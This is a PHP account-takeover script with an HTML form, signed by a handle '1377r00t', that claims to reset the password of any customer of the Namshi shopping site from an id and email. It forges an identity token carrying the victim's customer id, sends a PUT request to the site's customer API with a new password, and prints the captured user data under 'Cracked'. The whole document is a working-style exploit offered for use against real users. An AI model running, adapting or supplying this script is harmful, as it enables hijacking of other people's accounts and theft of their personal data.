Change the password of any account [Nmshi] via [id+email]

1. <center>
2. Boooom[Nmshi] by 1377r00t
3. <form method="POST" action="">
4. Email :<input name="email" type="text"><br>
5. Id :<input name="id" type="text" value="يتكون من 7 ارقام"><br>
6. New Password : <input name="password" type="text"><br>
7. <input type="submit" value="Logged">
8. </center>
9. </form>
10. <?
11. $email = $_POST['email'];
12. $id = $_POST['id'];
13. $password = $_POST['password'];
14. $base64 = ('
15. {
16.  "username": "'.$email.'",
17.  "roles": [
18.    "ROLE_CUSTOMER",
19.    "ROLE_CUSTOMER"
20.  ],
21.  "customerId": '.$id.',
22.  "exp": 1497353545,
23.  "iat": 1492169545
24. }');
25. $encoded = urlencode($base64);
26. $ch = curl_init();
27. curl_setopt($ch, CURLOPT_URL, "https://my.namshi.com/api/jerry/customers/$id.json");
28. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
29. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
30. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
31. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
32. curl_setopt($ch, CURLOPT_HTTPHEADER, array(
33.     'Host: my.namshi.com',
34.     'Connection: keep-alive',
35.     'Content-Length: 22',
36.     'n-tenant: namshi',
37.     'Accept: application/json',
38.     'Origin: https://my.namshi.com',
39.     'n-locale: ar_SA',
40.     'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/56.0.2924.87 Mobile Safari/537.36',
41.     'Content-type: application/json',
42.     'Referer: https://my.namshi.com/password/change',
43.     'Accept-Encoding: gzip, deflate',
44.     'Accept-Language: ar-AE,en-US;q=0.8',
45.     'Cookie: identity=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXUyJ9.'.$encoded.'.K44hBhxQJf6wwwEndEidJmVyOKj-heelzjNujHNnU01D-TERVGgOtl5wMA3Q5297C3WrcxenvY0Kdsd_Dcc4zi5kT3W4j8PhWxpAn79V88_IHbYCS94I4Pc8DmKrJp_aEfcJPNcKmGYvJvCMmHUvRgOo70TPCbg76nX-JEoR3n4; locale-v1=ar_SA',
46.     'X-Requested-With: com.namshi.android'
47.     ));
48. curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query('{"password":"'.$password.'"}'));
49. curl_setopt($ch, CURLOPT_HEADER, 1);
50. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
51. $check = curl_exec($ch);
52. ///////////////////////////////////////////
53. $startid = explode('{"lastUpdatedPhone":{"id":' , $check );
54. $endid = explode(',"number":"' , $startid[1] );
55. $iduser = $endid[0];
56. ///////////////////////////////////////////
57. $startemail = explode(',"email":"' , $check );
58. $endemail = explode('","firstName":"' , $startemail[1] );
59. $emailuser = $endemail[0];
60. ///////////////////////////////////////////
61. echo '
62. <center>
63. <br>
64. Cracked :-<br>
65. Id : '.$iduser.'<br>
66. Email : '.$iduser.'<br>
67. Password : '.$password.'<br>
68. Good Bye<br>(Twitter:1337r00t)<br>(Instagram:1337r00t)<br>'.$check.'
69. </center>
70. ';